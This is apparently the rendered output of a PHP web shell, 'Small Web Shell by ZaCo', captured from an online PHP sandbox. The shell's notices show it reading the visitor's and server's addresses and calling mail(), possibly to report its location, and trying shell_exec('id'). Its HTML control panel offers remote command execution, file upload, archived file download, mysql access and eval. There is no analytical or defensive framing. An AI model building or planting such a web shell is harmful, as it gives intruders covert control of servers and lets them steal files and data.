Notice: Undefined variable: sd98 in /in/avLYS on line 24 Notice: Undefined index: HTTP_REFERER in /in/avLYS on line 24 Notice: Undefined index: REMOTE_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_SOFTWARE in /in/avLYS on line 24 Warning: mail() has been disabled for security reasons in /in/avLYS on line 24 Warning: shell_exec(): Unable to execute 'id' in /in/avLYS on line 70 <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style><center>###<a href='avLYS'>cmd</a>###<a href='avLYS?mysql'>mysql</a>###<a href='avLYS?eval'>eval</a>###</center>id :<form method='post' name='main_form'> <input name='work_dir' value='/' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=''> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <strong>Listing /</strong><hr>Error Listing /

preferences:
279.32 ms | 410 KiB | 279 Q